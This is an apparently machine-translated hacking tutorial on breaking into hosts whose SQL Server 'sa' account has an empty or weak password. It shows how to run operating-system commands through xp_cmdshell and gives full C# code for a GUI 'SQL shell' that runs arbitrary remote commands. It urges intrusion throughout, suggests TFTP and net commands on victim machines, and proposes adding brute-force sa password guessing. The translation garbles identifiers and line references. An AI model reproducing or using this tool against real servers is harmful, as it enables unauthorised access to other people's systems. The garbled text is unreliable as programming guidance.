| This article has contributed to the hacker security base. The article is owned by the hacker security base and cannot be reproduced without the consent of the hacker security base. Thank you for your cooperation! Do you want to intrude into the system? Do you want to get the system administrator privilege? What if I want to remotely operate other people's computers? What do you do? Brute force cracking of the administrator password using a scanner? Or remote overflow? If you don't think these technologies are suitable for operating system intrusion, why don't you try them from another angle? The door cannot be entered. Is there a window! Sometimes we do not have to keep an eye on the operating system password, because it may be easier to get the password for other services provided by the system.
Have you ever seen a system that provides SQL Server services when you run various scanner scans? Does the Scanner report that the SQL Server sa user password is empty or weak? If your answer is yes, have you used this vulnerability to intrude into a host? Let's take a look at what we can do with the SA user permission of an SQL Server.
When we have the SA permission for SQL Server, we can execute the Extended Stored Procedure xp_mongoshell. Log On with the SA user using the query analyzer and execute any possible statements through xp_cmdshell to implement the functions we expected.
For example, we obtained the SA password "123456" for an SQL Server computer named "M-s ". Then, start the SQL query analyzer (this tool is included with the SQL Server client), enter the computer name, user name, and password, and log on to the SQL server as determined. 1:
Figure 1
Now let's take a look at the contents in the C-drive root directory of this computer. You can enter "xp_mongoshell" dir C:/"in the query analyzer :/"". There will be 2 results:
Figure 2
Have you seen it? The execution result of this statement is the content in the root directory of the C drive on this computer. What do you want to do in the C root directory? Let's change the command to execute: TFTP, net, ...... Aren't these commands that you dream of executing on the computer you want to intrude? We did not scan the administrator password of the operating system. Because SQL Server intrusion does not require the administrator privilege of the operating system.
However, it is inconvenient to use the SQL query analyzer. To install the SQL query analyzer, you must install the SQL Server Client. If you don't talk about anything else, the installation steps and precautions will be enough for me to cheat a lot of the article fee with xiaobian. Now that we know the principles, why don't we write a tool on our own?
Next, we will use the. NET system. Data. sqlclient namespace specifically used to connect to the SQL server class using VC # to compile an SQL-plain shell.
When using VC # To make SQL-shell, is it a little dizzy? You must connect to the SQL database and execute the extended storage process. Don't worry! Because the function in the. NET class library is too powerful, we need to write less than 40 lines of code manually. Next, let's talk about the specific compiling method.
Of course, according to my habits, we should first make the interface we need (Figure 3 ):
Figure 3
Create a new project for a Windows Application in VC # and name it sqlcmd. In the following description, the content in the brackets is the control property settings that need to be modified, and the default value is reserved for unspecified properties.
Add a grouping box (Name: groupbox1 text: SQL Server) to the form (Name: frmmain text: SQL-plain shell ). Add three labels (Name: label1 text: SQL Server, name: label2 text: User Name, name: label3 text: password) and three text boxes (Name: txtserver, name: txtid text: SA, name: txtpassword passwordchar :*). Add a check box (Name: cbnullpassword text: Empty Password) to the group box. Add a list box (Name: lbresult horizontalscrollbar: True tabstop: false), a label (Name: label4 text: Command), a combo box (Name: cbcmd) to the form frmmain) and a button (Name: btncmd text: execution ). Finally, add a status bar (Name: statusbar1), and add two panels (Name: Systolic text: Status width: 40, name: sbpmsg) to the status bar ). At the same time, you can adjust the anchor attribute of the control to make it beautiful.
Two non-visualized data controls are also added. The two controls are included in the "data" item on the control panel. Sqlconnection (Name: sqlconn) and sqlcommand (Name: sqlcomm connection: sqlconn)
Okay, the interface is ready, and the rest is the encoding.
Add the following code to the checkedchanged event of the check box cbnullpassword:
Private void cbnullpassword_checkedchanged (Object sender, system. eventargs E)
{
Txtpassword. Enabled =! Cbnullpassword. checked;
}
In this way, the password box is unavailable when the password is blank. Some readers may ask: is this a bit more? When SA is empty, can we leave the password empty? This is certainly possible, but not perfect. I will explain later why I want to add such a check box.
Add the following code to the keypress event of the cbcmd box:
Private void cbcmd_keypress (Object sender, system. Windows. Forms. keypresseventargs E)
{
If ('/N' = E. keychar)
Btn1__click (sender, e );
}
When the combo box gets the focus and press enter, it is equivalent to clicking the btncmd button.
Now, we should write down the core part. For convenience, I added a line number before the code.
10 private void btn1__click (Object sender, system. eventargs E)
20 {
30 try
40 {
50 sbpmsg. Text = "command '" + cbcmd. Text + "' is executing ...";
60 this. cursor = cursors. waitcursor;
70 string PW = NULL;
80 If (! Cbnullpassword. Checked)
90 PW = "Password =" + txtpassword. Text + ";";
100 sqlconn. connectionstring = "Initial catalog = Master;" + PW + "Persist Security info =" + (! Cbnullpassword. Checked). tostring () + "; user id =" + txtid. Text + "; workstation id =" + txtserver. Text + "; packet size = 4096 ";
110 sqlcomm. commandtext = "xp_mongoshell 'CMD/C" + cbcmd. Text + "′";
120 sqlcomm. Connection. open ();
130 lbresult. Items. Add ("【★★★★★/"" + Cbcmd. Text + "/"★★★★★]");
140 sqldatareader reader = sqlcomm. executereader ();
150 while (reader. Read ())
160 {
170 If (! Reader. isdbnull (0 ))
180 lbresult. Items. Add (reader. getstring (0 ));
190}
200 sbpmsg. Text = "command '" + cbcmd. Text + "' execution successful! ";
210 sqlcomm. Connection. Close ();
220 lbresult. Items. Add ("【★★★★★/"" + Cbcmd. Text + "/"★★★★★]");
230 lbresult. Items. Add ("");
240 If (! Cbcmd. Items. Contains (cbcmd. Text ))
250 cbcmd. Items. insert (0, cbcmd. Text );
260 cbcmd. Text = NULL;
270 lbresult. selectedindex = lbresult. Items. Count-1;
280 This. cursor = cursors. default;
290}
300 catch (exception ex)
310 {
320 this. cursor = cursors. default;
330 sbpmsg. Text = ex. message;
340}
350}
Next I will explain the above Code.
The 50 lines indicate that the current command is running in the status bar. When an exception is thrown during execution of the entire program, the exception will be caught in Row 3. The cause of the exception captured on Row 330 is displayed in the status bar.
Since some commands may be executed for a long time, 60 rows will change the mouse to the waiting style. After the command is executed normally, the mouse is displayed on line 3. If an exception occurs during execution and the program cannot execute up to 280 rows, the mouse will be restored in the Exception Handling Section. That is, 320 rows are restored.
Line 80 checks whether SA logs in with a blank password or a non-empty password. This is because the sqlconnection conectionstring contains an item "Persist Security Info ". If this parameter is set to "true", the logon password is required. Of course, this password can also be a null string. If this parameter is set to "false", no password verification is performed during login. This will speed up the connection to the SQL server.
The second line is the command to extend the stored procedure. Here, I want to note that I use the form "xp_cmdshell 'COMMAND/C [command] '" to execute commands. You can also directly use "xp_cmdshell '[command]'", but the execution results without "CMD/C" are beautiful.
Lines 130th, 220, and 230 are purely delimiters for beautiful results.
Row 140 declares an instance of sqldatareader. It is used to save the result of command execution. From 150 to 190, the program reads the command execution result using sqldatareader and saves it to the list box. It must be noted that the number of rows is 170. Here, you must determine whether the read record is null. If it is not null, you can add it to the list box. Otherwise, an exception occurs when the getstring method is called for null values.
The 240 line checks whether the current command is available in the list item of the combo box. If no 250 lines are executed, add the current command to the combo box list. And clear the text in the combo box in 260.
The 270 line is used to display the latest command execution result in the list box on the volume.
So far, a simple SQL-plain shell has been created. How is the effect good? (Figure 4)
Figure 4
I am still in my old habit. I will give you some tips on my incomplete functions.
1. When you are running this program, the command execution will be slow. This is because every time you execute a command, you need to re-connect to the database, execute the extended stored procedure, and then disconnect from the database. You can try to connect before executing the command. You only need to execute the stored procedure in the future.
2. Because the command execution is slow, the program is not responding when executing the while statement of Line 1. To avoid this situation, multithreading can be used. (For the use of multithreading, refer to the article I wrote earlier about VC # multithreading scanner)
3. You can refer to the article I wrote earlier on how to create a multi-threaded scanner for VC. Adds the dictionary-based brute force SA password scan function. Make this SQL-shell a really useful tool. |
